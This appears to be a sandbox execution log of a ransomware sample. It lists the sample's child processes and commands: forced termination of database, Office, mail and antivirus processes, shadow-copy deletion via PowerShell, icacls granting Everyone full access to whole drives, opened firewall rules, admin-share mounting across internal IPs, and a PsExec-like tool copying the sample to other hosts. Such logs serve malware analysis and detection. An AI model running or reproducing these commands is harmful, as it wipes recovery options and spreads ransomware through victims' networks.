C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:424
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:3872
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:2452
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1348
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:804
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3860
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1768
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:2704
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3972
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:3904
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
PID:3936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1768
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:3904
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
PID:3968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵PID:1232
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
PID:3196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3904
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵PID:3964
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3872
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
PID:3332
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵PID:2836
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
PID:4008
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:3136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
PID:3576
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
PID:3196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵PID:2100
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:2784
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
PID:3932
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵PID:2736
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
PID:3828
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵PID:3480
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
PID:3944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1956
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
PID:1192
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
PID:1232
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:2268 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3972
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:384
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵PID:3944
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵PID:2700
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵PID:2712
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
PID:3044
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:2312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2648
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3720
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:3400
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\Users2⤵PID:1432
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\A$2⤵PID:2784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\B$2⤵PID:3688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\C$2⤵PID:3720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\D$2⤵PID:424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\E$2⤵PID:2164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\F$2⤵PID:2736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\G$2⤵PID:3292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\H$2⤵PID:3324
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\I$2⤵PID:1672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\J$2⤵PID:3916
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\Users2⤵PID:1792
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\K$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\A$2⤵PID:2268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\L$2⤵PID:424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\B$2⤵PID:3956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\M$2⤵PID:3960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\C$2⤵PID:1232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\N$2⤵PID:1672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\D$2⤵PID:3968
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\N$2⤵PID:1956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\O$2⤵PID:2164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\E$2⤵PID:3932
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\P$2⤵PID:2272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\O$2⤵PID:3176
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\P$2⤵PID:736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\F$2⤵PID:3324
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\Q$2⤵PID:3196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\G$2⤵PID:1468
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\Q$2⤵PID:1280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\R$2⤵PID:3044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\H$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\R$2⤵PID:1956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\S$2⤵PID:4028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\S$2⤵PID:4040
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\I$2⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\T$2⤵PID:1680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\T$2⤵PID:3660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\J$2⤵PID:1576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\U$2⤵PID:2196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\U$2⤵PID:940
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\V$2⤵PID:1280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\V$2⤵PID:3720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\K$2⤵PID:3964
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\W$2⤵PID:1192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\L$2⤵PID:2648
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\W$2⤵PID:3132
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\X$2⤵PID:3784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\M$2⤵PID:1652
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\X$2⤵PID:2200
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\Y$2⤵PID:3660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\Y$2⤵PID:1576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\127.0.0.1\Z$2⤵PID:3172
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.10\Z$2⤵PID:2456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.11\Users2⤵PID:4044
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:3972
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Users2⤵PID:2232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\A$2⤵PID:1904
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\A$2⤵PID:1680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\B$2⤵PID:3932
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\B$2⤵PID:424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\C$2⤵PID:2176
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\C$2⤵PID:2180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3400
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\D$2⤵PID:2456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\D$2⤵PID:2104
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\E$2⤵PID:3816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\E$2⤵PID:744
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\F$2⤵PID:3964
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\F$2⤵PID:2312
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\G$2⤵PID:3872
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\G$2⤵PID:2736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\H$2⤵PID:3576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\H$2⤵PID:3372
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\I$2⤵PID:940
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\I$2⤵PID:3916
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\J$2⤵PID:2236
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\J$2⤵PID:2832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\K$2⤵PID:1956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\K$2⤵PID:2272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\L$2⤵PID:2200
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\L$2⤵PID:3956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\M$2⤵PID:2104
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\M$2⤵PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:2696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\N$2⤵PID:1936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\N$2⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\O$2⤵PID:3044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\O$2⤵PID:3736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\P$2⤵PID:2700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\P$2⤵PID:3476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Q$2⤵PID:1476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Q$2⤵PID:2832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\R$2⤵PID:1900
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\R$2⤵PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:2460
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\S$2⤵PID:1232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\S$2⤵PID:3720
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\T$2⤵PID:3688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\T$2⤵PID:2712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\U$2⤵PID:3916
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\U$2⤵PID:1956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\V$2⤵PID:1936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\V$2⤵PID:960
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:2164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\W$2⤵PID:416
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\W$2⤵PID:424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\X$2⤵PID:408
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\X$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Y$2⤵PID:3488
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Y$2⤵PID:2700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Z$2⤵PID:3324
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.15\Z$2⤵PID:2696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.16\Users2⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.16\A$2⤵PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:3288
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.16\B$2⤵PID:1900
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\Users2⤵PID:1788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\A$2⤵PID:3784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\C$2⤵PID:2280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\B$2⤵PID:2232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\D$2⤵PID:1956
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\C$2⤵PID:2700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\E$2⤵PID:1192
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\D$2⤵PID:3332
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\F$2⤵PID:1280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\E$2⤵PID:2712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\G$2⤵PID:1756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1672
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\F$2⤵PID:2012
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\H$2⤵PID:3816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\G$2⤵PID:1576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\I$2⤵PID:3196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\H$2⤵PID:3168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\J$2⤵PID:960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\I$2⤵PID:4044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\K$2⤵PID:3660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\J$2⤵PID:3688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\L$2⤵PID:2780
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\K$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\N$2⤵PID:3136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\M$2⤵PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:2748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\L$2⤵PID:4072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\O$2⤵PID:3004
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\N$2⤵PID:2104
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\M$2⤵PID:1988
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\P$2⤵PID:3688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\O$2⤵PID:3816
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\Q$2⤵PID:3288
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\P$2⤵PID:3324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1680
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.14\R$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\Users2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\Q$2⤵PID:836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\S$2⤵PID:3484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\R$2⤵PID:1988
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\A$2⤵PID:3944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\T$2⤵PID:2912
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\S$2⤵PID:2696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\U$2⤵PID:940
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\B$2⤵PID:3288
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\T$2⤵PID:3132
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\V$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\C$2⤵PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:4072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\U$2⤵PID:1192
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\W$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\D$2⤵PID:3916
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\X$2⤵PID:3780
-
-
